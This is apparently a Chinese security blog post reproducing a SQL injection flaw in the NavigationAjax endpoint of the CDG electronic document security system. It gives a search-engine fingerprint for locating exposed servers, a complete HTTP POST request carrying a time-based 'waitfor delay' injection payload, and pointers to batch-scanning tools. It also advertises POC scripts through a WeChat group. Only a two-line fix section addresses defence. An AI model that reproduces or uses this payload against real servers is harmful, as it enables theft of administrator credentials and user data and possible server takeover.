【漏洞复现】某赛通电子文档安全管理系统 NavigationAjax SQL注入漏洞

0x01 产品简介

某赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。

0x02 漏洞概述

某赛通电子文档安全管理系统NavigationAjax接口处存在sql注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 搜索引擎

bash 复制代码
body="/CDGServer3/index.jsp"

0x04 漏洞复现

bash 复制代码
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
 
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

sqlmap验证

0x05 工具批量

nuclei

afrog

xray

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子

0x06 修复建议

1、关闭互联网暴露面或接口设置访问权限

2、升级至安全版本

相关推荐
YA3334 小时前
java基础(九)sql基础及索引
java·开发语言·sql
码出未来8577 小时前
浅谈DDL、DSL、DCL、DML、DQL
sql
AI 嗯啦7 小时前
SQL详细语法教程(四)约束和多表查询
数据库·人工智能·sql
阿里云大数据AI技术7 小时前
【跨国数仓迁移最佳实践6】MaxCompute SQL语法及函数功能增强,10万条SQL转写顺利迁移
python·sql
喂完待续14 小时前
【Tech Arch】Hive技术解析:大数据仓库的SQL桥梁
大数据·数据仓库·hive·hadoop·sql·apache
路多辛15 小时前
Golang database/sql 包深度解析(二):连接池实现原理
数据库·sql·golang
javachen__19 小时前
SpringBoot整合P6Spy实现全链路SQL监控
spring boot·后端·sql
武昌库里写JAVA1 天前
JAVA面试汇总(四)JVM(一)
java·vue.js·spring boot·sql·学习
老虎06271 天前
数据库基础—SQL语句总结及在开发时
数据库·sql·oracle
Mr. zhihao1 天前
SQL LEFT JOIN 与 WHERE 条件的隐藏坑
数据库·sql